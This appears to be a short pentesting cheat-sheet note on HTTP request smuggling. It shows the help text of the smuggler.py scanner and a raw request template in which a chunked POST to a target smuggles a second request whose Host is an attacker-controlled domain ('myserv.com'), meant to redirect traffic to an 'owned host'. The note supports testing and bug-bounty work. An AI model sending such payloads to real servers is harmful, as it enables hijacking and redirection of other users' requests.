HTTP Request Smuggling

HTTP Request Smuggling

https://portswigger.net/web-security/request-smuggling

# Smuggler.py is a small tool used to test that
python smuggler.py -h

                                         _                             
         ___ _ __ ___  _   _  __ _  __ _| | ___ _ __       _ __  _   _ 
        / __| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__|     | '_ \| | | |
        \__ \ | | | | | |_| | (_| | (_| | |  __/ |     _  | |_) | |_| |
        |___/_| |_| |_|\__,_|\__, |\__, |_|\___|_|    (_) | .__/ \__, |
                             |___/ |___/                  |_|    |___/ 

                        by @gwendallecoguic


usage: smuggler.py [-h] [-a PATH] [-d HEADER] [-i TIMEOUT] [-m METHOD]
                   [-o HOSTS] [-s SCHEME] [-t THREADS] [-u URLS] [-v VERBOSE]

optional arguments:
  -h, --help            show this help message and exit
  -a PATH, --path PATH  set paths list
  -d HEADER, --header HEADER
                        custom headers
  -i TIMEOUT, --timeout TIMEOUT
                        set timeout, default 10
  -m METHOD, --method METHOD
                        set methods separated by comma, default: all
  -o HOSTS, --hosts HOSTS
                        set host list (required or -u)
  -s SCHEME, --scheme SCHEME
                        scheme to use, default: http,https
  -t THREADS, --threads THREADS
                        threads, default 10
  -u URLS, --urls URLS  set url list (required or -o)
  -v VERBOSE, --verbose VERBOSE
                        display output, 0=nothing, 1=only vulnerable, 2=all
                        requests, 3=requests+headers, 4=full debug, default: 1


Redirecting to Owned host

https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142

# Request using Transfer-Encoding: chunked
# Then, another request, toward controlled domain
# You can use Burp Collaborator to prove it

POST /xxxx HTTP/1.1
Transfer-Encoding: chunked
Host: www.target.com
...

data
0

GET /somefile HTTP/1.1
Host: myserv.com
X-Ignore: X